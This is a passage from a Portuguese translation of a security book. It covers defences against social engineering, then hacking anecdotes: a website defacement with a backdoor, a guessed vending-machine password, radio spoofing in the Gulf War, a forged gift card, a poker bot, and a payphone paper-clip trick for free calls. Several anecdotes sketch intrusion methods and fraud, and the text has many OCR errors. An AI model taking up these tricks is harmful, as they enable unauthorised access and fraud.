reconhecidos e como e possivel resistir a eles. 
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• Procure esclarecer aos trainees que eles se sentirao tolos se forem manipulados em um ataąue de 
engenharia social depois do treinamento. 

O treinamento deve enfatizar a responsabilidade de cada funcionario por ajudar a proteger ativos 
corporativos sensiveis. Alem disso, e vital que os responsaveis pelo treinamento re-conheęam que a 
motivaęao para seguir protocolos de seguranęa em certas situaęoes só aumenta quando se entende por que 
esses protocolos sao necessarios. Durante o treinamento em consciencia da seguranęa, os instrutores devem 
dar exemplos da proteęao assegurada pelo protocolo e dos danos que podem recair sobre a empresa se as 
pessoas o ignorarem ou forem negligentes com relaęao a seu cumprimento. 

Tambem e util ressaltar que um ataque de engenharia social bem-sucedido pode pór em risco as 
informaęoes do funcionario e de seus amigos e colegas na empresa. O banco de dados dos recursos 
humanos da empresa pode conter informaęoes pessoais extremamente valiosas para ladroes de identidade. 
Mas o fator mais motivador pode ser o fato de que ninguem gosta de ser manipulado, enganado, trapaceado. 
Desse modo, as pessoas sao altamente motivadas a nao serem vitimas de vigaristas, porque isso as fara se 
sentir tolas ou estupidas. 

Programas para combater a engenharia social 

A seguir sao apresentados alguns pontos basicos a serem considerados no momento da elaboraęao dos programas: 

• Desenvolva procedimentos para aęoes dos funcionarios quando houver suspeita de um 
ataque de engenharia social ou quando ele for detectado. 

O leitor tern acesso a um extenso manuał de politicas de seguranęa em A arte de enganar. Essas politicas 
devem ser consideradas como referencia; use aquelas de que precisar e esqueęa as demais. Depois que os 
procedimentos da empresa forem desenvolvidos e colocados em pratica, a informaęao deve ser dmdgada na 
Intranet da empresa, que pode ser rapidamente acessada. Outro recurso excelente e o tratado de Charles 
Cresson Wood sobre o desenvolvimento de politicas de seguranęa de informaęoes, Information security 
policies madę easy (San Jose, CA: Baseline Software, 2001). 

• Desenvolva orientaęoes simples para funcionarios, definindo que informaęoes a empresa 
considera confidenciais. 

Como na maior parte do tempo processamos informaęoes no modo heuristico, podem ser elaboradas regras 
simples de seguranęa para dar sinal vermelho em caso de solicitaęoes que envolvem informaęoes 
confidenciais (como a senha de um individuo). Quando um funcionario no tar que foram solicitadas 
informaęoes confidenciais ou alguma aęao no computador, pode consultar o manuał de politica de 
seguranęa na pagina Web da Intranet da empresa para determinar o protocolo ou procedimento correto a 
seguir. Alem disso, e importante entender e transmitir aos funcionarios que ate mesmo as informaęoes que 
nao sao consideradas tao confidenciais podem ser uteis a um engenheiro social, que pode coletar 'perolas' de 
qualquer informaęao aparentemente inutil e junta-las para criar a ilusao de credibilidade e confiabilidade. O 
nome do gerente de um projeto confidencial de urna empresa, a localizaęao fisica de urna equipe de 
desenvolvedores, o nome 
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do servidor usado por determinado funcionario e o nome atribuido a um projeto secreto sao informaęoes 
significativas. Cada empresa precisa ponderar suas necessidades para se precaver de urna posslvel ameaęa a 
seguranęa. 

Esses sao apenas alguns dos muitos exemplos de informaęoes aparentemente sem importancia que podem 
ser uteis a um atacante. Cenarios como aąueles apresentados em A arte de enganar podem ser de grandę 
utilidade na transmissao dessa noęao aos trainees. Modifiąue normas de educaęao na organizaęao — Nao 
ha problema em dizer 'nao'? Quase todos nós nos sentimos mai ou incomodados ao dizer 'nao' aos outros. 
(Um produto novo no mercado destina-se a pessoas que sao educadas demais para bater o telefone na cara 
dos operadores de telemarketing, Quando um representante liga, o usuario aperta a tecla asterisco e desliga; 
urna voz diz a pessoa que chamou: "Desculpe-me, este e o Phone Butler e fui acionado para informa-lo que 
esta residencia lamenta recusar sua solicitaęao". Eu adoro o 'lamenta'. Mas acho interessante que tantas 
pessoas precisem comprar um dispositivo eletrónico para dizer 'nao' em seu lugar. Voce pagaria 50 dólares 
por um dispositivo que o poupasse do 'constrangimento' de dizer 'nao'?) 

Um dos objetivos do programa de treinamento de engenharia social da empresa deve ser redefinir a norma 
de educaęao na empresa. Esse novo comportamento inclui declinar educadamente solicitaęoes confidenciais 
ate que a identidade e a autorizaęao do solicitante para receber tal informaęao sejam verificadas. O 
treinamento pode, por exemplo, sugerir respostas do tipo: "Como funcionarios da empresa X, ambos 
sabemos quanto e importante seguir os protocolos de seguranęa. Logo, ambos entendemos que vou ter de 
verificar sua identidade antes de atender a sua solicitaęao". Criando procedimentos para verificar a 
identidade e a autorizaęao. 

Cada empresa deve criar um procedimento para verificar a identidade e a autorizaęao de pessoas que 
solicitem informaęoes ou aęoes a funcionarios. O processo de verificaęao, em qualquer situaęao, dependera 
necessariamente da confidencialidade das informaęoes ou das aęoes que forem solicitadas. Como acontece 
com muitas outras questoes no local de trabalho, a seguranęa tern de ser equilibrada de acordo com as 
necessidades da organizaęao. O treinamento precisa tratar tanto das tecnicas óbvias quanto das mais sutis, 
como, por exemplo, o uso de um cartao de visitas (como feito por Whurley) para comprovar credenciais. 
(Lembre-se da personagem interpretada por James Gamer na serie policial Arquivo confidencial, da decada 
de 1970, que mantinha em seu carro urna pequena impressora para que pudesse imprimir um cartao de visitas 
adequado a ocasiao.) Fomecemos urna sugestao de procedimento de verificaęao em A arte de enganar 2 
Consiga a aprovaęao da alta gerencia. 

isso, evidentemente, e quase um cliche: todo esforęo significativo da gerencia comeęa com a consciencia de 
que, para ter sucesso, o programa precisa do apoio da gerencia. Talvez haja poucos esforęos corporativos 
em que esse apoio seja mais importante que a própria seguranęa, que se toma mais vital a cada dia, embora 
contribua muito pouco para aumentar a receita corporativa e, frequentemente, seja relegada a ultimo piano. 
No entanto, isso só reforęa o fato de que o compromisso com a seguranęa deve comeęar de cima. 
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Numa nota relacionada, a alta gerencia deveria enviar tambem duas mensagens claras sobre o assunto. Os 
funcionarios nunca serao solicitados pela gerencia a driblar qualquer protocolo de seguranęa. E nenhum 
funcionario tera problemas em seguir os protocolos de seguranęa, mesmo que solicitado por urn gerente a 
viola-los, 

Conheęa os manipuladores em sua própria familia — seus filhos 

Muitos filhos (ou a maioria deles?) tern uma capacidade surpreendente para manipular — muito parecida com a 
habilidade usada pelos engenheiros sociais —, que só e perdida quando eles crescem e se tomam mais socializados. 
Todo pai ja foi alvo do ataque de um filho. Quando um jovem quer muito alguma coisa, pode ser incansavel, 
chegando a ponto de incomodar demais e, ao mesmo tempo, ser engraęado. 

Enquanto Bill Simon e eu estavamos terminando este livro, fili testemunha do incómodo ataque de engenharia 
social de uma crianęa. Minha namorada, Darci, e sua filha de nove anos, Briannah, foram me encontrar em Dallas 
quando eu estava la a negócios. No hotel, na vespera de embarcar em um vóo notumo, Briannah testou a paciencia de 
sua mae ao exigir que fossem a um restaurante que ela tinha escolhido para jantar — e fez um escandalo. Darci 
aplicou-lhe uma punięao moderada: tirou-lhe temporariamente o Gameboy e disse-lhe que ela nao jogaria seus games 
por um dia. 

Briannah suportou isso durante algum tempo. Depois, aos poucos, comeęou a tentar achar maneiras diferentes de 
convencer a mae a devolver seu gamę, e ainda nao tinha desistido quando eu voltei para ficar com elas. A reclamaęao 
constante da filha incomodava a mae. Percebemos que ela estava tentando fazer engenharia social conosco e 
comeęamos a tomar nota: 

• "Estou chateada. Por favor, pode devolver meu gamę?" (Falado como uma exigencia, nao como uma 
pergunta.) 

• "Eu vou ficar louca se nao tiver meus games." (Acompanhado de um choramingo.) 

• "Nao vou ter nada para fazer no aviao sem meus games." (Falado em um tom de "Qualquer idiota 
entenderia isso".) 

• "Seria bom se eu tivesse só um gamę para jogar, nao seria?!" (Uma promessa disfaręada em pergunta.) 

• "Eu vou ficar boazinha se voce me devolver o gamę." (Com a mais completa sinceridade.) 

• "Na noite passada eu fiai realmente boazinha, entao por que nao posso jogar agora?" (Uma tentativa 
desesperada baseada em um raciocinio confuso.) 

• "Nao vou mais fazer isso" (Pausa,) "Posso jogar agora?" ("Nao vou mais fazer isso" — ela acha que somos 
tontos?) 

• "Pode me devolver o gamę agora, por favor?" (Se as promessas nao funcionam, talvez implorar um pouco 
ajude...) 

• "Tenho de voltar para a escola amanha, entao nao poderei jogar meu jogo se nao comeęar agora." (Tudo 
bem, ha quantos tipos diferentes de engenharia social? Talvez ela devesse ter sido colaboradora deste livro.) 

• "Desculpe, eu estava errada. Posso jogar só um pouquinho?" (Talvez a confissao seja boa para a alma, mas 
pode nao funcionar muito como manipulaęao.) 

• "Foi o Kevin que me fez fazer isso." (Eu pensei que só os hackers dissessem isso!) 
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• "Estou triste de verdade sem meu gamę." (Se nada funcionar, tente despertar um pouco de 
compaixao.) 

"Ja fiąuei mais de meio dia sem meu gamę." (Em outras palavras. "Quanto sofrimento e o 
suficiente?") 

• "Jogar nao custara nenhum dinheiro." (Urna tentativa desesperada de adivinhar qual seria a razao de sua 
mae para prolongar a punięao por tanto tempo. Errou feio.) 

• "E o firn de semana do meu aniversario e eu nao posso jogar meus games." (Outro lance para se fazer de 
coitada e obter compaixao.) 

E continuando, enąuanto nos preparavamos para ir para o aeroporto: 

• "Eu vou ficar chateada no aeroporto." (Na esperanęa desesperada de que o aborrecimento fosse considerado 
urna coisa terrivel a ser evitada a todo custo. Se Briannah nao ficasse muito chateada, talvez pudesse tentar 
desenhar ou ler um livro.) 

• "Sao tres horas de vóo e eu nao terei nada para fazer!" (Ainda alguma esperanęa de que ela poderia ceder e 
abrir o livro que tinha trazido.) 

• "Esta escuro demais para ler ou para desenhar. Se eu jogar meu gamę, posso ver a tela." (A tentativa 
desesperada de apresentar urna razao*) 

• "Posso pelo menos usar a Internet?" (Deve haver alguma compaixao em seu coraęao.) 

• "Voce e a melhor mae do mundo!" (Ela tambem sabe usar elogios e adulaęoes numa tentativa debil de 
conseguir o que quer.) 

• "Nao e justo!!!" (O ultimo esforęo, a ultima apelaęao.) 

Se voce quer entender melhor como os engenheiros sociais manipulam seus alvos e como levam as pessoas a passar 
de um estado racional para um estado emocional... ouęa seus filhos. 

Em nosso primeiro livro, Bill Simon e eu rotulamos engenharia social de "o link mais fraco da seguranęa de 
informaęao". 

Tres anos depois, o que descobrimos? Descobrimos urna empresa atras da outra empregando tecnologias de 
seguranęa para proteger seus recursos de computaęao contra a invasao tecnica de hackers ou espioes industriais 
contratados e mantendo seguranęa fisica efetiva para se proteger contra invasores nao autorizados. 

Contudo, descobrimos tambem que pouca atenęao e dada ao combate das ameaęas impostas pelos engenheiros 
sociais. E essencial educar e treinar funcionarios para que se protejam da ameaęa e para que nao sejam induzidos a 
ajudar os intruso*. O desafio de se defender contra as vulnerabilidades do ser humano e fundamental. Proteger a 
organizaęao dos hackers que usam taticas de engenharia social deve ser responsabilidade de todo funcionario — todo 
funcionario, mesmo aquele que nao usa computador em sua tarefa rotineira. Os executivos sao vulneraveis, o pessoal 
do atendimento e vulneravel, as telefonistas, as recepcionistas, o pessoal de limpeza, os atendentes da garagem e, 
especialmente, os funcionarios novos — tudo pode ser explorado pelos engenheiros sociais como mais um passo para 
atingir seu objetivo ilicito. 


in 
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O elemento humano tem sido, comprovadamente, o link mais fraco de seguranęa de informaędes ha anos. 
A pergunta de um milhao de dólares e: voce vai ser o link fraco para um engenheiro social poder explorar na 
empresa? 

Notas 

1. A observaęao feita pelo psicólogo Neidert pode ser encontrada on-line em www.chapman.edu/comm/ 
comm/faculty/thobbs/com401/socialinfluence/mindfl.html. 

2. Ver Kevin D. Mitnick e William L. Simon, A arte de enganar (Sao Pauto: Pearson Makron Books, 2003). 
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Nao sou criptoanalista nem matematico. Só sei como as pessoas cometem erros em 
aplicativos, e elas cometem sempre os mesmos erros. 

Ex-hacker, hoje consultor de seguranęa 


Algumas histórias que recebemos enąuanto escreviamos este livro nao se encaixavam bem em nenhum 
dos capitulos anteriores, mas sao engraęadas demais para serem ignoradas. Nem todas sao de hacks. Algumas 
sao brincadeiras, outras sao manipulaęao, algumas sao valiosas por esclarecer ou revelar determinado aspecto 
da natureza humana... e algumas sao simplesmente engraęadas. 

Gostamos delas e achamos que talvez voce tambem possa gostar, 

O contracheque que faltava 

Jim era sargento do Exercito norte-americano e fazia parte de um grupo de informatica em Fort Lewis, 
Puget Sound, no estado de Washington. Trabalhava sob a tirania de um primeiro sargento. que Jim descreve 
como "de mai com o mundo", o tipo de cara que "usava sua patente para fazer todos os subordinados se 
sentirem pessimos". Um dia, Jim e seus colegas de grupo se encheram e chegaram a conclusao de que 
precisavam encontrar urna maneira de punir o grosseirao por tomar a vida deles tao insuportavel. 

A unidade em que trabalhavam lidava com registros de pessoal e lanęamentos na folha de pagamento. 
Para assegurar a exatidao desses lanęamentos, dois soldados-escriturarios davam a entrada em cada item 
separadamente e os resultados eram comparados antes de os dados serem introduzidos no registro de cada 
soldado. 
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A vinganęa que eles pianejaram era bastante simples, diz Jim. Dois funcionarios fizeram entradas identicas e 
registraram no computador que o sargento estava morto. 

Aquilo, evidentemente, interrompeu a emissao de seu contracheque. 

Quando chegou o dia do pagamento e o sargento reclamou que nao tinha recebido seu contracheque, 
"Procedimentos padrao ordenavam que se usasse a ficha do arquivo e se preenchesse o contracheque a tinta". Mas 
aquilo tambem nao funcionou. "Por alguma razao desconhecida", escreveu Jim, de um modo bem-humorado, "a ficha 
dele nao foi localizada em lugar nenhum. Tenho razoes para acreditar que ela simplesmente evaporou". Nao e dificil 
imaginar como Jim chegou a essa conclusao. 

Era muita falta de sorte do sargento: o computador mostrava que o homem estava morto e nao havia registros em 
papel para mostrar que um dia ele havia existido! Nao existia nenhum procedimento pelo qual se pudesse emitir um 
contracheque para um homem que nao existia. Foi preciso enviar urna solicitaęao a sede do Exercito pedindo que as 
cópias do registro do homem fossem tiradas e encaminhadas- Alem disso, foi solicitada a orientaęao sobre que 
autoridade poderia efetuar o pagamento dele nesse interim. As solicitaęoes foram enviadas, mas nao se tinha muita 
expectativa de que fossem respondidas rapidamente. 

Essa historia tern um finał feliz. Jim relata que "o comportamento do primeiro sargento passou a ser bastante 
diferente ate o ultimo dia em que tivemos contato". 

Venha para Hollywood, adolescente sabido 

Quando o filme Jurassic Park 2 foi lanęado, um jovem hacker, que chamaremos de Yuki, decidiu que queria 'ter' 
(ganhar controle) a caixa MCA/Elniversal Studios que era host do lost-world.com, o site Web do filme Jurassic Park 
e dos programas de TV do estódio. 

Como ele diz, "o hack era bem facil", porque o site era mai protegido. Ele tirou vantagem disso usando um 
metodo que descreveu em termos tecnicos como "inserindo um CGI que executava um bouncer (porta mais alta sem 
firewall] para que eu pudesse me conectar com urna porta mais alta e me conectar de volta a um host local para ter 
pleno acesso". 

Na epoca, o MCA ficava em um edificio novo. Em urna breve pesquisa na Internet, Yuki descobriu o nome da 
construtora, pegou seu site Web e teve pouca dificuldade para invadir sua rede. (isso foi ha muito tempo; presume-se 
que essas vulnerabilidades óbvias ja estejam corrigidas.) 

de dentro do firewall teve pouco trabalho para localizar a planta baixa em AutoCAD do edificio da MCA. Yuki 
ficou muito satisfeito. Entretanto, aquilo era apenas um aperitivo. Um amigo dele se dedicou a desenhar "um logo 
novo e bonito" para as paginas Web de Jurassic Park, substituindo o nome Jurassic Park e o tiranossauro de 
mandibula aberta por um patinho. Eles entraram no site Web, colocaram seu logo (ver Figura 11.1) no lugar do 
oficial e esperaram para ver o que iria acontecer. 

A resposta nao foi bem o que eles esperavam. A midia achou o logo engraęado, mas suspeito. A CNet News.com 
fez urna reportagem' em cuja manchete se perguntava se aquilo era um hack ou urna brincadeira, suspeitando que 
alguem na Universal poderia ter feito aquela faęanha para divulgar o filme. 

Yuki diz que entrou em contato com a Universal logo depois, informando-a sobre o furo que ele e seu amigo 
tinham usado para obter acesso ao site e sobre urna back door que haviam instalado. Ao 
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Figura 11.1: Substituto do logotipo de Jurassic Park. 


contrario de muitas organizaęoes que descobrem a identidade de alguem que invadiu seu site Web ou sua rede, o 
pessoal na Universal apreciou as informaęoes. 

Melhor que isso, a Universal ofereceu um emprego a Yuki — sem duvida, imaginando que ele seria util para 
encontrar e eliminar outras vulnerabilidades. Yuki ficou bastante empolgado com a oferta. 

Mas nao deu certo. "Quando eles descobriram que eu tinha apenas 16 anos, tentaram me pagar menos." Ele 
recusou o convite. 

Dois anos depois, a CNet News.com apresentou urna lista de seus dez hacks favoritos. 2 Yuki adorou ver seu hack 
do Jurassic Pond entre eles. 

Mas seus dias de hacking terminaram, diz Yuki. Ele "ja esta fora de cena ha cinco anos". Depois de recusar a 
oferta da MCA, ele iniciou a carreira de consultor, que esta seguindo desde entao. 

Fazendo hack de urna maquina de refrigerante 

Tempos atras, a Xerox e outras empresas testaram maquinas que lembrariam um pouco o bordao "ET, telefone 
casa". A maquina de reproduęao, por exemplo, seria capaz de monitorar seu próprio status, e, quando o tonner 
estivesse acabando c os rollers de alimentaęao estivessem comeęando a se desgastar, ou algum outro problema fosse 
detectado» seria gerado um sinal para urna estaęao remota ou urna sede corporativa para relatar a situaęao. Entao, um 
tecnico com peęas para reparo seria enviado ao local. 

De acordo com David, nosso informante, urna das empresas que testaram isso foi a Coca-Cola. Segundo ele, 
maquinas de vendas de Coca-Cola experimentais eram conectadas a um sistema Unix e podiam ser interrogadas 
remotamente, enviando um relatório de seu status operacional. 

Um dia, quando estavam entediados, David e alguns amigos decidiram investigar o sistema c ver o que 
conseguiam descobrir. Como esperavam, a maquina podia ser acessada pela telnet. "Ela era ligada a urna porta serial, 
Um processo captava seu status c o formatava." Eles usaram o programa Finger e descobriram que "tinha sido feito 
um login aquela conta — a nós só restava descobrir a senha". 
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Eles só precisaram de tres tentativas para adivinhar a senha, embora algum programador de empresa tivesse 
escolhido, intencionalmente, uma bastante improvavel. Ganhando acesso, eles descobriram que o código-fonte para o 
programa era armazenado na maąuina: "Nao pudemos resistir a fazer aąuela peąuena mudanęa!". 

Eles inseriram um código que acrescentaria uma linha no finał da mensagem produzida cerca de uma em cada 
cinco vezes: "Ajude! Alguem esta me chutando!". 

"O mais engraęado de tudo", diz David, "foi quando adivinhamos a senha". Quer saber qual era a senha que o 
pessoal da Coca tinha tanta certeza de que ninguem seria capaz de adivinhar? 

de acordo com David, a senha da maquina de vendas da Coca era 'Pepsi'! 

Enfraquecendo o exercito iraquiano numa tempestade no 
deserto 

Nos estagios preparatórios para a operaęao Tempestade no Deserto, a Inteligencia do Exercito norte-americano 
foi trabalhar nos sistemas de comunicaęao do Exercito iraquiano, enviando helicópteros carregados com equipamento 
sensor com radiofrequencia a locais estrategicos ao longo "do lado seguro da fronteira do Iraque". Essa e a frase 
descritiva usada por Mikę, que estava la. 

Os helicópteros foram enviados em esquadrilhas de tres. Antes da evoluęao do GPS (Sistema de Posicionamento 
Global ) para indicar localizaęoes, os tres helicópteros fomeceram as coordenadas que permitiam que o pessoal da 
Inteligencia situasse as localizaęoes de cada unidade do Exercito do Iraque e as radiofrequencias que eles estavam 
usando. 

Depois de iniciada a operaęao, os Estados Unidos estavam aptos a se manter na escuta e a interceptar as 
comunicaęoes do Iraque. Mikę conta: "Os soldados norte-americanos que falavam farsi comeęaram a ouvir os 
comandantes iraquianos enquanto eles conversavam com seus llderes da patrulha das tropas em campo". E nao só 
escutavam. Quando um comandante pediu que todas as suas unidades estabelecessem as comunicaęoes 
simultaneamente, as unidades registraram: "Aqui e Camel 1"; "Aqui e Camel 3"; "Aqui e Camel 5". Entao, um 
americano que estava na escuta falou em farsi pelo radio: "Aqui e Camel 1", repetindo o nome registrado. 

Confuso, o comandante iraquiano disse a Camel 1 que ja o tinha registrado e por isso nao deveria faze-lo duas 
vezes. Camel 1 respondeu inocentemente que só tinha se registrado uma vez. "Houve uma discussao para saber quem 
estava dizendo o que", conta Mikę. 

Os escutas do Exercito faziam o mesmo com diferentes comandantes iraquianos, acima e abaixo da fronteira, 
Entao eles decidiram passar ao próximo nlvel da trama. Em vez de repetir um nome de registro, uma voz americana, 
em ingles, disse: "Aqui fala Bravo Force 5 — como voces estao indo?". de acordo com Mikę. "Aquilo ia dar uma 
confusao danada!". 

As interferencias deixaram os comandantes furiosos. Eles devem ter se sentido humilhados pelo fato de suas 
tropas em campo terem ouvido os invasores ateus perturbando as comunicaęoes e, ao mesmo tempo, chocados por 
descobrirem que nao podiam dar ordens as suas unidades por radio sem que as foręas norte-americanas ouvissem cada 
palavra. Eles comeęaram a mudar rotineiramente as frequencias de backup. 

O equipamento sensor de radiofrequencia nos helicópteros do Exercito norte-americano foi concebido para 
derrotar aquela estrategia, Ele escaneava a banda de radio C localizava rapidamente a frequencia para a qual os 
iraquianos tinha mudado. Os norte-americanos na escuta logo estavam 

IM 
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novamente no controle. Enąuanto isso, a cada mudanęa, a Inteligencia do Exercito conseguia aumentar a lista de 
freąuencias que estavam sendo usadas pelos iraąuianos. E eles continuavam a montar e refinar a 'ordem de batalha' da 
foręa de defesa iraąuiana — tamanho, localizaęao e designaęao das unidades, e ate mesmo planos de aęao. 

Finalmente, os comandantes iraąuianos entraram em desespero e desistiram da comunicaęao por radio com suas 
tropas, recorrendo, em vez disso, a linhas de telefone subterranea. Novamente, os Estados Unidos seguiam seus 
movimentos. O Exercito iraąuiano estava contando com antigas linhas de telefone serial basico, e era simples acessar 
ąualąuer urna dessas linhas com um transmissor criptografado, encaminhando todo o trafego para a Inteligencia do 
Exercito. 

Os soldados do Exercito norte-americano que falavam farsi voltaram a trabalhar usando os mesmos metodos de 
antes para atrapalhar as comunicaęoes por radio. E engraęado imaginar a expressao na face de um major, coronel ou 
generał iraąuiano ąuando urna voz jovial soava pelo aparelho: "Oi, aqui e Bravo Force 5 novamente. Como voces 
estao indo?". 

E talvez ele acrescentasse algo como: "Nós perdemos a conexao por um instante e e bom estar-mos de volta", 

Nesse ponto, os comandantes iraąuianos nao tinham outras opęoes de comunicaęao moderna, Entao, apelaram: 
passaram a escrever as ordens e enviar as mensagens para os oficiais em campo por meio de caminhoes, Esses oficiais 
escreviam suas respostas e as enviavam pelo mesmo caminhao ate a sede. Em virtude disso, urna unica pergunta e sua 
resposta podiam levar horas para chegar ao destinatario. Comandos que exigiam a aęao coordenada de varias 
unidades se tomavam ąuase impossiveis, porąue era muito dificil transmitir em tempo as ordens a cada unidade de 
campo envolvida para que agissem juntas. 

Aąuela nao era urna maneira efetiva de se defender contra as foręas norte-americanas, que se moviam 
rapidamente. 

Assim que a guerra aerea comeęou, um grupo de pilotos norte-americanos foi incumbido de procurar caminhoes 
que enviavam mensagens de um lado para outro entre os locais conhecidos dos grupos iraąuianos em campo. A Foręa 
Aerea comeęou a considerar esses caminhoes de comunicaęao como alvos e a tira-los de aęao. Em poucos dias, os 
motoristas iraąuianos passaram a se recusar a transportar mensagens entre os lideres de campo, porąue sabiam que era 
morte certa. 

Aąuilo levou a urna paralisaęao ąuase total na capacidade do sistema de comando e controle iraąuiano. Conforme 
Mikę contou, mesmo ąuando o Comando Central do Iraąue era capaz de enviar ordens por radio, os comandantes em 
campo "ficavam aterrorizados com essas comunicaęoes, porąue sabiam que as mensagens estavam sendo ouvidas pelo 
Exercito norte-americano e seriam usadas para enviar contra-ataąues ao ponto em que estavam". Isso se dava 
principal-mente porąue, ao responder as ordens, o comandante em campo revelava que ainda estava vivo e, com isso, 
sabia que sua resposta permitiria aos norte-americanos identificar sua localizaęao. Num esforęo de poupar a própria 
vida, algumas unidades iraąuianas em campo desativaram seus dispositivos de comunicaęao remanescentes para que 
nao tivessem de ouvir as mensagens que chegassem. 

"Em pouco tempo", lembra Mikę, eufórico, "o Exercito iraąuiano sucumbiu ao caos e a inatividade em varios 
pontos, porąue ninguem conseguia se comunicar nem estava disposto a faze-lo". 
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O Vale-Presente de um bilhao de dólares 

A maior parte do trecho a seguir foi extraida de uma coiwersa nossa com um ex-hacker, que hoje 
um consultor respeitado e bem estabelecido. 

Esta tudo la, cara, tudo la. "Por que voce rouba bancos, Sr. Horton?" "E onde esta o 
dinheiro." 

Eu vou lhe contar uma historia engraęada. Esse cara. Frank, da National Security 
Agency, e eu — nem vou dar o nome dele, ele hoje trabalha para a Microsoft. Tmhamos 
uma incumbencia [um pen test] com uma empresa que fabricava vales-presente digitais. 
Ela foi fechada, mas mesmo assim nao vou revelar o nome. Entao, qual sera nosso hack? 
Vamos fazer hack do cripto no vale-presente? Nao. [a criptogralla] era espantosa, e 
muito bem-feita. E criptograficamente segura; seria perda de tempo tentar. Entao, o que 
vamos atacar? 

Verificamos como um comerciante resgata um vale-presente. Este e um ataque de 
insider, porque temos permissao para ter uma conta de comerciante. Bem, encontramos 
uma falha no sistema de troca, uma falha de aplicativo que nos dava execuęao arbitraria 
de comando na caixa. Era tolice, criancice, nao era necessario nenhuma habilidade 
especial — voce só precisava saber o que estava procurando. Nao sou criptoanalista nem 
matematico. Só sei como as pessoas cometem erros em aplicativos, e elas cometem sempre 
os mesmos erros. 

Na mesma sub-rede com o centro de troca, eles tem [uma conexao] com sua prensa — a 
maquina que faz os vales-presente. Inyadimos aquela maquina usando um 
relacionamento de confianęa. Em vez de ter um prompt root, fizemos um vale-presente 
— inventamos um com 32 bits high e estabelecemos a unidade monetaria em dólares 
americanos. 

Agora temos um vale-presente no valor de 1,9 bilhao de dólares. E ele era totalmente 
yalido. Alguem disse que deveriamos te-lo conyertido em libras, pois o valor seria maior. 
Entao, fomos ao site Web da Gap e compramos um par de meias. Teoricamente, tmhamos 
um bilhao e novecentos milhoes como troco para um par de meias. Era espantoso. Eu quis 
colocar as meias no relatório do pen test. 

Mas o hacker nao se deu por satisfeito. Ele nao gostou do modo como percebeu que a historia 
devia ter soado para nos e continuou, esperando corrigir a impressao. 

Talvez eu pareęa um astro de rock para voces, mas tudo o que voces veem e o caminho 
que fiz e voces vao dizer: "Ah, meu Deus, veja como ele e inteligente. Ele fez isso para 
entrar no caixa, e entao no caixa ele violou um relacionamento de confianęa, e depois la 
ele entrou na prensa e fabricou um vale-presente". 
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Sim, mas voce sabe como isso foi dificil? Foi como: "Bem, experimente, isso funcionou?" Nada 
de venda. "Experimente isso, funcionou?" Nada de novo. Tentatiya e erro. E curiosidade, 
perseveranęa e sorte. E um pouco de habilidade misturada a tudo isso. Eu ainda tenho aąuelas 
meias. 

O hack de Texas Hold'Em 

Uma das coisas com relaęao as ąuais os jogadores de póąuer se sentem seguros ao se sentar a mesa de 
um cassino de grandę porte — estejam jogando Texas Hold'Em, a versao mais popular de hoje, ou alguma 
outra variaęao — e que, sob os olhos vigilantes do dealer, dos chefes de area (pits) e de todas as cameras de 
video focadas neles, eles podem contar com a própria habilidade e sorte e nao se preocupar muito com a 
possibilidade de os outros jogadores estarem trapaceando, 

Hoje em dia, graęas a Internet, e possivel sentar-se numa mesa de póąuer eletrónico — jogar 
confortavelmente sentado em seu próprio computador, a dinheiro, contra jogadores que estao diante de seus 
computadores em varias partes do pais e do mundo, 

E entao entra em cena um hacker que descobre uma maneira de tirar uma peąuena vantagem disso 
usando um bot caseiro — um robo —, neste caso eletrónico. Ron, o hacker, diz que isso exigiu a "criaęao de 
um robo que jogasse um póąuer on-line 'matematicamente perfeito', enganando os oponentes e levando-os a 
pensar que estavam jogando contra um ser humano, real". Alem de ganhar dinheiro nos jogos diarios, ele 
inscrevia seu robo em inumeros tomeios, com um sucesso impressionante. "Em um tomeio (sem taxa de 
inscrięao) com grupos de ąuatro jogadores, que comeęou com trezentos participantes, o robo terminou em 
segundo lugar." 

As coisas iam muito bem ate que Ron cometeu um erro de julgamento: ele decidiu colocar o robo a venda 
a um preęo de 99 dólares por ano para cada comprador. As pessoas comeęaram a ouvir sobre o produto. O 
pessoal que jogava póąuer on-line — ąue era o seu alvo — comeęou a se preocupar com a possibilidade de 
estar jogando contra robós. "Aąuilo causou tanto tumulto (e preocupaęao da direęao do cassino com receio de 
perderem clientes) que o site acrescentou um código para detectar o uso do robo e disse que proibiria de 
jogar, permanentemente, quem fosse pego usando um robo." 

Hora de mudar a estrategia 

Depois de tentar, sem sucesso, transformar a tecnologia de robo num negócio, decidi levar todo 
o projeto para o submundo. Modiflquei-o para Jogar em um dos maiores sites de póąuer on- 
line e ampliei a tecnologia para que ele pudesse Jogar no 'modo eąuipe', no qual dois ou mais 
robós na mesma mesa trocam cartas escondidas entre si para ganhar uma yantagem. 

Em seu e-mail original sobre sua aventura, Ron deixou implicito que seus robós ainda estavam sendo 
usados. Mais tarde, ele escreveu nos pedindo para dizer o seguinte: 
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Depois de avaliar os prejuizos financeiros que seriam causados a milhares de jogadores de 
póąuer on-line, Ron decidiu nunca mais usar sua tecnologia contra os outros. 

Jogadores on-line, voces precisam decidir o que fazer por si mesmos- Se Ron pode fazer isso, outros 
tambem podem. Voces se dariam melhor comando um aviao para Las Vegas. 

O adolescente caęador de pedófilos 

Bill e eu achamos esta historia interessante, Embora talvez seja parcialmente verdadeira ou, na nossa 
opiniao, totalmente inventada, decidimos apresenta-la exatamente da maneira como chegou as nossas maos; 

Tudo comeęou ąuando eu tinha cerca de ąuinze anos. Um amigo meu, Adam, me mostrou como 
fazer ligaęoes telefónicas gratuitas do telefone publico da escola, que ficava localizado fora do 
payilhao onde costumayamos almoęar. Era a primeira vez que eu fazia urna coisa 
'remotamente' ilegal. Adam usava um clipe de papel no lugar de um cartao telefónico para 
apertar o receptor do fone. Entao ele discava o numero de telefone que queria chamar, 
segurando o ultimo digito do numero e ao mesmo tempo tocando o clipe de papel no bocal. 
Seguia-se uma serie de cliques e entao o telefone tocava. Eu fiquei boquiaberto. Foi a primeira 
vez em minha vida que eu percebi quanto poder eu poderia ter. 

Imediatamente comecei a ler tudo o que caia em minhas maos. Se fosse uma informaęao 
duvidosa, eu tinha de obte-la. Usei o truque do clipe de papel durante todo o ginasio, ate que 
meu interesse me conduziu para coisas mais perigosas. Talvez fosse para ver ate onde iria nesse 
caminho recem-descoberto. Aquilo, somado ao suspensę de fazer uma coisa 'errada', era o 
suficiente para levar qualquer jovem de quinze anos a ingressar no mundo marginal. 

Depois, percebi que era necessario mais do que conhecimento para ser um hacker. Voce tinha 
de ter aquela sagacidade social para fazer a trapaęa. 

Aprendi esses programas chamados Cavalo de Tróia por intermedio de um amigo on-line. que 
